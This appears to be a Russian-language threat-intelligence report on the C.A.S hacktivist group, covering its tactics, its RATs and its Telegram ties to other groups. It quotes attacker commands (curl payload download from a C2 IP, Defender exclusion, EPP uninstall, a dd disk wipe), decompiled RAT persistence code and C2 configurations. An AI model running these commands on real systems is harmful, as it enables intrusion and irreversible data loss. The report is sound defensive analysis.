О группировке C.A.S

C.A.S (Cyber Anarchy Squad) — группа хактивистов, атакующая организации в России и Беларуси, активная с 2022 года. Ее основная цель, помимо кражи данных, — нанесение максимального ущерба, в том числе и репутационного. Для этого в своих атаках группа эксплуатирует уязвимости в публично доступных сервисах и использует свободно распространяемое ПО.

В недавнем исследовании мы обнаружили новую активность группы, исследовали этапы атаки, используемые инструменты и вредоносное ПО. Кроме того, мы нашли связи между C.A.S и другими хактивистскими группировками, такими как Ukrainian Cyber Alliance и DARKSTAR.

C.A.S, как и большинство хактивистских группировок, использует Telegram как платформу для распространения информации о своих жертвах. Мы обнаружили канал, в котором публикуются новости об атаках группы и сообщения идеологического характера, а также чат, где обсуждается деятельность группировки.

Telegram-канал C.A.S

Подчеркиваем, что в статье описаны активные Telegram-каналы, предположительно связанные с хактивистскими группировками. Используйте данные источники с осторожностью.

Используемые тактики

В этом разделе представлен анализ цепочки атаки согласно классификации MITRE ATT&CK, а также исследование инструментария, который мы обнаружили в текущей кампании группы C.A.S.

Initial Access

Первоначальный доступ к атакуемым системам С.A.S получает с помощью эксплуатации публично доступных приложений (Exploit Public-Facing Application, T1190). Злоумышленники компрометируют сервисы Jira, Confluence и Microsoft SQL Server при помощи уязвимостей, определить которые нам не удалось из-за ограничений хранения данных атакованного сегмента. Однако анализ сообщений лидера группы в Telegram-канале C.A.S позволяет предположить, что хактивисты не используют фишинговые письма в качестве первоначального вектора атаки. Вместо этого они, вероятно, атакуют уязвимые сетевые ресурсы либо получают доступ к системе за счет его компрометации третьими лицами.

Сообщения лидера группировки C.A.S, The Way

Цель группы C.A.S — нанести максимальный финансовый и репутационный ущерб организациям в России и Беларуси. Для достижения этой цели они, вероятно, эксплуатируют уязвимости не только в Jira, Confluence и MS SQL, но и в других публично доступных сервисах и системах. Кроме того, нам известно об атаках, проведенных группой C.A.S совместно с другими группировками, что также позволяет им получать первоначальный доступ и продвигаться по инфраструктуре жертв.

Сообщение о методах получения первоначального доступа

Execution

Для дальнейшего продвижения по инфраструктуре атакующие использовали редкие троянцы удаленного доступа (Remote Access Trojans, RAT) из открытых источников, такие как Revenge RAT и Spark RAT, — мы не видели их в атаках других хактивистов. Эти утилиты позволяли злоумышленникам удаленно управлять зараженными системами и выполнять различные команды.

В одном из инцидентов мы обнаружили, что атакующие использовали скомпрометированный сервис MS SQL для выполнения команд в cmd. На это указывает запуск процесса cmd.exe в качестве дочернего процесса sqlservr.exe.

Также злоумышленники использовали PowerShell для выполнения скриптов:

powershell.exe -ex bypass -f \[DOMAIN]netlogonrm.ps1

Кроме того, атакующие скачивали с C2-сервера на зараженное устройство обратную оболочку Meterpreter для фреймворка Metasploit при помощи инструмента cURL:

«$system32cmd.exe»,»»$system32cmd.exe» /c cd %appdata% && dir && curl -O
hxxp://185.117.75[.]3:8092/sdc.exe

В некоторых инцидентах с обратной оболочкой мы также обнаружили следы запуска Revenge RAT (48210CA2408DC76815AD1B7C01C1A21A) через процесс PowerShell:

powershell.exe -WindowStyle Hidden -NoExit -Command
[System.Reflection.Assembly]::LoadFile(‘C:Users<username>Downloads
<exe_name>.exe’).EntryPoint.Invoke($null, @())

Persistence

Для закрепления в системе злоумышленникам удалось создать учетные записи на скомпрометированных устройствах с помощью утилиты net.exe:

C:Windowssystem32cmd.exe» /c net user admin cas /add
C:Windowssystem32cmd.exe» /c net user admin admin123123123 /add

Примечательно, что при создании учетной записи

admin злоумышленники использовали пароль cas, совпадающий с названием группировки.

Мы также обнаружили образцы Revenge RAT, которые закреплялись в системе с помощью добавления ключей реестра в HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run:

try {
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(«SOFTWARE\Microsoft\Windows\CurrentVersion\Run», true);
try {
if (!((string)((registryKey != null) ? registryKey.GetValue(«»» +
Path.GetFileNameWithoutExtension(Program._installName) + «»») : null) == text) &&
registryKey != null) {
registryKey.SetValue(fileNameWithoutExtension, «»» + text + «»»);
}
} catch {
if (registryKey != null) {
registryKey.SetValue(fileNameWithoutExtension, «»» + text + «»»);
}
}
if (registryKey != null) {
registryKey.Dispose();
}
}
internal static string _installName = «rpchost.exe»;

Эти образцы троянца также копировались в директорию автозагрузки:

File.Copy(Application.ExecutablePath, «C:\Users\» + Environment.UserName +
«\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\» +
Program._installName);

internal static string _ip = «194.36.188.94»;
internal static string _installName = «svhost.exe»;

Один из образцов RAT (FC3A8EABD07A221B478A4DDD77DDCE43), упомянутый выше, во время выполнения создавал сторожевой таймер, файл под названием svxhost.exe в директории C:WindowsSystem32, записывал в него информацию, создавал службу NgcMngrSvc с svxhost.exe в качестве исполняемого файла и запускал эту службу:

[HandleProcessCorruptedStateExceptions] private static void CreateWatchdog() {
Program.hService = Helper.OpenService(Program.hSCM, «NgcMngrSvc», 4);
if (Program.hService == IntPtr.Zero) {
try {
File.WriteAllBytes(Program.system + «svxhost.exe», Program.GetResource(«dog»));
} catch {
}
Program.hService = Helper.CreateService(Program.hSCM, «NgcMngrSvc», «Microsoft
Passport Manager», 983551, 16, 2, 0, Program.system + «svxhost.exe», null, IntPtr.Zero,
null, null, null);
}
Helper.StartService(Program.hService, 0, null);
}

Defense Evasion

Во время расследования инцидентов мы неоднократно отмечали, что злоумышленникам удается получить полный контроль над средствами защиты информации из-за их неправильной настройки. Чтобы реализовать эффективные меры по предупреждению атак, необходимы регулярная проверка, обновление и интеграция защитных систем. Кроме того, одним из важных факторов обеспечения безопасности инфраструктуры является соблюдение требований к парольной защите в рамках получения доступа к СЗИ.

В одном из инцидентов у группы C.A.S была возможность отключить агент EPP без пароля, используя сценарий rm.ps1:

$guidQuery = wmic product where «[redacted]» get IdentifyingNumber
$guid = $guidQuery | Select-String -Pattern «{[A-F0-9-]+}» | ForEach-Object { $_.Matches[0].Value }

if ($guid -ne $null) {
$msiexecCommand2 = «msiexec.exe /x $guid /quiet»
Start-Process -NoNewWindow -FilePath cmd -ArgumentList «/c $msiexecCommand2»
}

Финальная команда для отключения агента EPP выглядела следующим образом:

cmd.exe /c msiexec.exe /x {GUID} /quiet

Кроме того, в рамках техники Defense Evasion злоумышленники добавляют директорию $windir$system32 в список исключений Windows Defender при помощи Revenge RAT. Это позволяет группе скрывать свою активность, поскольку сам RAT и его вредоносная нагрузка устанавливаются именно в эту папку.

«»$windir\$system32\WindowsPowerShell\v1.0\powershell.exe» -WindowStyle Hidden —
Command «Add-MpPreference -ExclusionPath ‘$windir\$system32′»»

Кроме того, чтобы дополнительно снизить вероятность обнаружения, атакующие используют принцип именования зловредов, имитирующий легитимные процессы Windows:

C:WindowsSystem32svxhost.exe
C:WindowsSystem32svrhost.exe
C:WindowsSystem32driversetcrpchost.exe
C:Windowspantherssbyt.exe

Credential Access

В ходе исследований хактивистских группировок (таких, как Twelve, BlackJack, Head Mare и Crypt Ghouls) мы обнаружили, что они часто используют связку одних и тех же утилит для сбора учетных данных в своих атаках, например: XenAllPasswordPro, BrowserThief и Mimikatz. Эти инструменты давно известны в сообществе и регулярно фигурируют в наших отчетах об угрозах.

XenAllPasswordPro — позволяет извлекать пароли из системных хранилищ.
BrowserThief — используется для компрометации данных браузеров, включая данные автозаполнения и сохраненные учетные записи.
Mimikatz — извлекает хэши паролей из оперативной памяти Windows.

Группировка C.A.S не стала исключением: мы обнаружили вышеперечисленные инструменты и в ее атаках. Это в очередной раз подтверждает, что хактивистские группировки, атакующие Россию и Беларусь, в основном используют одинаковый арсенал утилит из открытого доступа.

Discovery

На этапе исследования инфраструктуры злоумышленники активно применяли разнообразные команды для сбора информации. Вот список команд, которые мы зафиксировали.

Команда
Описание

net user
Выводит список всех локальных учетных записей пользователей (при помощи net.exe)

systeminfo
Отображает подробную информацию о системе, включая версию, дату установки и исправления операционной системы, модель компьютера, параметры процессора и памяти

cmd ver
Выводит версию операционной системы

net localgroup
Показывает список всех локальных групп на компьютере (при помощи net.exe)

net accounts
Отображает настройки учетных записей пользователей, такие как срок действия и минимальная длина пароля, блокировка учетной записи (при помощи net.exe)

net user /domain
Выводит список учетных записей пользователей в домене (при помощи net.exe)

cd %appdata% && whoami
Переходит в папку %appdata%, а затем выводит имя пользователя, выполняющего эту команду

Также образцы Revenge RAT выполняли запросы WMI для сбора информации об операционной системе и процессоре, чтобы в дальнейшем отправить ее на C2 злоумышленников:

SELECT * FROM Win32_OperatingSystem
SELECT UserName FROM Win32_ComputerSystem
SELECT * FROM WIN32_Processor

Command and Control

Для коммуникации с командным центром (C2) группировка C.A.S использует различные инструменты. Мы обнаружили, что злоумышленники применяют обратные оболочки, сгенерированные с помощью инструмента msfvenom для фреймворка Metasploit, а также публично доступные RAT-троянцы.

Revenge RAT

При помощи троянца Revenge RAT злоумышленники устанавливали соединение с командным сервером, после чего загружали и устанавливали необходимые полезные нагрузки различных фреймворков, а также собирали данные о зараженном устройстве и отправляли их на сервер.

В исследуемых атаках мы обнаружили два похожих кастомизированных образца Revenge RAT. Ниже представлен полный список функций, найденных в этих вариантах.

FC3A8EABD07A221B478A4DDD77DDCE43
48210CA2408DC76815AD1B7C01C1A21A

FilesInFolder
FilesInFolder

Drives
Drives

CreateFile
CreateFile

DeleteFile
DeleteFile

MoveFile
MoveFile

CopyFile
CopyFile

ArchiveFile
ArchiveFile

UploadFile
UploadFile

DownloadFile
DownloadFile

ShellCommand
ShellCommand

Uninstall
Uninstall

ClientModel

DisconnectMsg

Ping

Text

Конфигурационные файлы для этих образцов также похожи:

FC3A8EABD07A221B478A4DDD77DDCE43
48210CA2408DC76815AD1B7C01C1A21A

internal static string _ip = «194.36.188.94»;

internal static string _installName = «rpchost.exe»;

private static int _port = 1337;

internal static bool _install = true;

internal static string _group = «cci.by2»;

internal static string _startupMethod = «hklm»;

internal static string _installLocation = «windir\System32\drivers\etc\»;

internal static bool _installWatchdog = true;

internal static bool _usePowershell = false;

private static Client _client;

internal static Process cmd;

private static IntPtr hSCM;

internal static IntPtr hService;

private static string system = Environment.GetFolderPath(Environment.SpecialFolder.System) + «\»;

internal static string _ip = «194.36.188.94»;

internal static string _installName = «sysinfo»;

private static int _port = 1337;

internal static bool _install = true;

private static Client _tcpClient;

internal static Process cmd;

Spark RAT

Как упоминалось ранее, группа использовала еще один троянец удаленного доступа — Spark RAT. Ниже приведена его конфигурация.

{
  »secure»:false,
  »host»:»185.117.75.3″,
  »port»:9610,
  »path»:»/»,
  »uuid»:»3917b41****»,
  »key»:»aa494c90****»
}

С указанного в конфигурации IP-адреса злоумышленники скачивали на устройство жертвы полезную нагрузку Meterpreter.

Кроме того, Spark RAT автоматически собирает и отправляет на C2-сервер следующую информацию о системе.

Функция троянца
Описание

id
Уникальный идентификатор устройства

runtime.GOOS
Информация об операционной системе, в которой запущен RAT

runtime.GOARCH
Архитектура процессора

localIP
Локальный IP-адрес устройства

macAddr
MAC-адрес сетевого интерфейса устройства

cpuInfo
Информация о процессоре

ramInfo
Объем оперативной памяти устройства

netInfo
Общая информация о сетевых подключениях

diskInfo
Информация о дисковых накопителях

uptime
Время непрерывной работы системы с момента последней загрузки

hostname
Имя устройства

username
Имя текущего пользователя

Spark RAT предоставляет оператору широкий набор команд для управления целевым устройством. Эти команды позволяют осуществлять как базовые операции (например, PING для проверки доступности клиента, SHUTDOWN для выключения устройства или RESTART для его перезагрузки), так и более сложные действия, такие как удаленное управление файлами (FILES_LIST, FILES_FETCH, FILES_UPLOAD), взаимодействие с терминалом (TERMINAL_INIT, TERMINAL_INPUT, TERMINAL_RESIZE) и удаленный доступ к рабочему столу (DESKTOP_INIT, DESKTOP_SHOT). Также оператору доступны команды для управления процессами (PROCESSES_LIST, PROCESS_KILL) и выполнения системных команд (COMMAND_EXEC).

Meterpreter

В одном из инцидентов мы обнаружили обратную оболочку Meterpreter (6CBC93B041165D59EA5DED0C5F377171). С ее помощью группировка получала полноценный доступ к скомпрометированной системе и могла выполнять следующие действия.

Удаленное управление файловой системой.
Перехват сетевого трафика.
Запись нажатия клавиш.
Извлечение хэшей паролей.
Выполнение техник маршрутизации через скомпрометированные узлы.
Контроль веб-камеры и микрофона.

Обратная оболочка содержит следующий адрес C2-сервера и порт:

185.117.75[.]35:4444

Impact

Для нанесения ущерба жертвам группировка шифрует инфраструктуру. Как мы часто отмечаем в подобных атаках хактивистов, арсенал злоумышленников составляют слитые билдеры шифровальщика LockBit для систем Windows и Babuk для систем Linux. В большинстве атак C.A.S расширения зашифрованных файлов генерируются случайным образом, но иногда как в названии исполняемого файла троянца-шифровальщика, так и в добавляемых зашифрованным файлам расширениях присутствует число 3119. Оно часто встречается в деятельности группировки C.A.S, и мы наблюдаем его в именах пользователей, записках с требованием выкупа, расширениях зашифрованных файлов и атрибутике группы. Это число не случайная последовательность цифр, а комбинация порядковых номеров букв C, A и S в латинском алфавите: С — 3, A — 1, S — 19.

Один из образцов шифровальщика группировки C.A.S имеет название 3119.exe. При расследовании атаки группировки с использованием этого образца мы обнаружили записку о выкупе, отображаемую после шифрования файлов в системе:

Записка с требованием выкупа группировки C.A.S

Помимо шифрования злоумышленники могут уничтожать данные в различных сегментах сети жертвы или на определенных серверах. Для этого атакующие сначала собирают информацию о подключенных дисках в системе при помощи системной утилиты df:

df -h

Затем злоумышленники используют системную утилиту dd для уничтожения данных, которая выполняет файл /dev/zero, генерирующий бесконечный поток нулевых байтов. Атакующие записывают нулевые байты из данных /dev/zero в выбранный ими раздел /dev/[VOLUME] блоками размером 4 МБ. Таким образом данные в разделе перезаписываются на нули с потерей исходного содержимого без возможности его восстановления.

dd if=/dev/zero of=/dev/[VOLUME] bs=4M

Операция необратима, что позволяет атакующим уничтожать данные на серверах жертв.

Злоумышленники часто подтверждают факты своего деструктивного воздействия на инфраструктуру жертв, публикуя сообщения в Telegram-чате. В этих сообщениях они описывают проделанные действия и прикладывают скриншоты результатов своей работы. При этом в зависимости от ситуации атакующие выбирают, какую часть инфраструктуры шифровать, а какую уничтожать сразу.

Сообщение из публичного чата группировки C.A.S

Жертвы

Жертвами группировки C.A.S являются компании в России и Беларуси из различных отраслей, включая государственные и коммерческие организации, компании, специализирующиеся на развлечениях и технологиях, телекоммуникационные компании и промышленные предприятия. Это говорит о том, что злоумышленники выбирают жертв, исходя из их местоположения, вне зависимости от сферы деятельности организации.

Группировка C.A.S часто пишет о своих жертвах в своем Telegram-канале, публикуя скриншоты из инфраструктуры, украденные документы и ссылки на облачные хранилища или форумы для скачивания украденных данных.

Связь с другими группировками

Как уже говорилось выше, помимо Telegram-канала у группы есть открытый чат, где участники группировки и подписчики активно общаются. Интересно, что администраторами чата являются не только участники C.A.S, но и представители смежных групп, например Sean Townsend, который является администратором хактивистской группы RUH8 и пресс-секретарем группировки Ukrainian Cyber Alliance.

Администраторы чата C.A.S Discussions и Telegram-аккаунт лидера группы C.A.S, The Way

В своем Telegram-канале C.A.S заявляет, что в некоторых атаках сотрудничает с другими группировками, активность которых также направлена на организации в России и Беларуси. Например, в канале можно найти сообщения о совместных атаках C.A.S с группировками U.C.A (Ukrainian Cyber Alliance), RUH8, RM-RF и другими:

Сообщение о совместном взломе от C.A.S и U.C.A

Сообщение о совместном взломе C.A.S, RUH8 и RM-RF

Кроме того, во время исследования инцидента в инфраструктуре одной из жертв группировки C.A.S мы обнаружили следы компрометации, принадлежащие группировке DARKSTAR (также известной под именами Shadow и Comet). В рамках одного инцидента мы нашли следующие файлы:

DARKSTAR
C.A.S

Файл под названиями ServiceAD и Highimage (A2D098F44ABA4967826C3002541E3BB8), запускаемый в качестве службы (например, с помощью команд sc create, sc start) для выполнения вредоносных файлов, загружаемых в рамках атак DARKSTAR
Spark RAT — ovpmhnjotowtj.exe (BCEC17275114C6A87D8B7110AECEC5CC) с адресом C2 185.117.75[.]3

Загрузчик (7E101596EEB43ED2DE78BB45D7031F7B), обращающийся к домену itsfreerepublic[.]com для скачивания зашифрованного шелл-кода и передачи управления, который использовался во множестве атак группировки DARKSTAR
Revenge RAT — sysinfo.exe (48210CA2408DC76815AD1B7C01C1A21A) и ssbyt.exe (23B873BB66DC09E91127E20825B6CBC7) с адресом C2 194.36.188[.]94

Эти находки снова указывают на связь между группировками, атаки которых нацелены на российские организации. Мы предполагаем, что в рамках совместной работы участники групп делятся доступами к инфраструктурам жертв, инфраструктурой C2 и инструментами. Кроме того, группы обмениваются информацией об атаках в Telegram-каналах, таким образом увеличивая видимость своих кампаний, дискредитируя жертв и причиняя им репутационный ущерб.

Выводы

Деятельность группировки C.A.S представляет серьезную угрозу для организаций в Российской Федерации и Беларуси. Злоумышленники атакуют ключевые отрасли, используя арсенал инструментов и техник, который мы отмечаем в кампаниях других хактивистских группировок. Основу атак C.A.S составляют редкие троянцы удаленного доступа, общедоступные инструменты удаленного управления, а также разнообразные методы эксплуатации уязвимостей. Хактивисты также публикуют информацию об атаках в открытом Telegram-канале, что наносит жертвам не только финансовый, но и репутационный ущерб. Более подробный анализ атак группы C.A.S опубликован в закрытом отчете, доступном в рамках подписки на исследования угроз.

Группировка активно взаимодействует с другими злоумышленниками, нацеленными на Россию, о чем открыто сообщает в публичных каналах. Совместные действия групп хактивистов и использование общей инфраструктуры свидетельствуют о формировании более сложной экосистемы атак, где ресурсы, инструменты и доступы делятся между несколькими группами для повышения эффективности и масштабирования операций. Такая стратегия не только усложняет атрибуцию атак, но и значительно увеличивает их разрушительный потенциал.

Для эффективного противодействия таким группировкам критически важно усиливать защиту систем, применять регулярное обновление средств кибербезопасности, а также оперативно отслеживать активность вектора угроз на основании аналитических данных. Кроме того, крайне важно соблюдать базовые принципы настройки СЗИ. Мы настоятельно рекомендуем использовать следующие инструкции:

Настройка защиты управляемых приложений;
Руководство по усилению защиты.

Следование этим инструкциям позволит минимизировать риски компрометации и повысить устойчивость системы к возможным атакам.

Индикаторы компрометации

Revenge RAT

FC3A8EABD07A221B478A4DDD77DDCE43
rpchost.exe

48210CA2408DC76815AD1B7C01C1A21A
sysinfo.exe

8C70377554B291D4A231CF113398C00D
svhost.exe, svxhost.exe

23B873BB66DC09E91127E20825B6CBC7
ssbyt.exe, sysinfo.exe

Spark RAT

BCEC17275114C6A87D8B7110AECEC5CC
ovpmhnjotowtj.exe

Meterpreter

6CBC93B041165D59EA5DED0C5F377171
sdc.exe

1FCD4F83BF6414D79D5F29AD1E795B3D
svrhost.exe

File paths
C:windowsSystem32svxhost.exe
C:Windowssystem32svrhost.exe
C:WindowsSystem32driversetcrpchost.exe
C:Windowspantherssbyt.exe
C:Users[USERNAME]AppDataRoamingMicrosoftWindowsStart MenuProgramsStartupsvhost.exe

IPs
194.36.188[.]94
185.117.75[.]3

​  

​Securelist

Read More

Ваша реакция?
+1
0
+1
0
+1
0
+1
0
+1
0
+1
0
+1
0
0 0 голоса
Рейтинг статьи
Подписаться
Уведомить о
guest

0 комментариев
Старые
Новые Популярные
Межтекстовые Отзывы
Посмотреть все комментарии
0
Оставьте комментарий! Напишите, что думаете по поводу статьи.x